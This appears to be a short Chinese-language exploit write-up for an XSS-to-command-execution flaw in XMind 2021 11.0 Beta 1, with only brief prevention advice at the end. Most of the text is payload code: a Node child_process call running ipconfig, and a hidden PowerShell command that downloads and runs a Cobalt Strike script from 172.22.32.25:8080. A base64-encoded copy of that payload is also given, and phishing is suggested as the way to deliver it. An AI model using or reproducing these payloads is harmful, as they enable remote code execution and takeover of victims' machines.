0x01 XMind 介紹 :
XMind 2021 11.0 Beta 1 XSS漏洞導致命令執行
XMind是一種功能齊全的思維導圖和頭腦風暴工具,旨在產生想法,激發創造力,並在工作和生活中帶來效率。數以百萬計的用戶們喜歡它。
2021年5月10日, Xmind 2020存在XSS漏洞,攻擊者可以借助該漏洞實現命令執行,在實際環境中借助釣魚攻擊可能造成更嚴重的危害。
0x02下載地址
XMind 2021 v11.0.0 Beta 1 x64 官方版 for Windows
https://dl2.xmind.cn/XMind-2021-for-Windows-64bit-11.0.0-Beta1-202105061920.exe
0x03漏洞利用方式:
選擇事件型XSS需要附帶onerror事件,比如img、audio等。
測試 彈窗代碼:
構造命令執行payload
require('child_process').exec('ipconfig /all',(error, stdout, stderr)=>{
alert(stdout: ${stdout});
});
最終利用代碼:
反彈shell命令
CS生成powershell腳本
原始代碼:
require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:// 172.22.32.25:8080/a''))"',(error, stdout, stderr)=>{
alert(stdout: ${stdout});
});
代碼base64加密:
cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLyAxNzIuMjIuMzIuMjU6ODA4MC9hJ1wnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7Cg==
最終插入代碼:
0x05 預防:
升級到最新版本
謹慎打開Xmind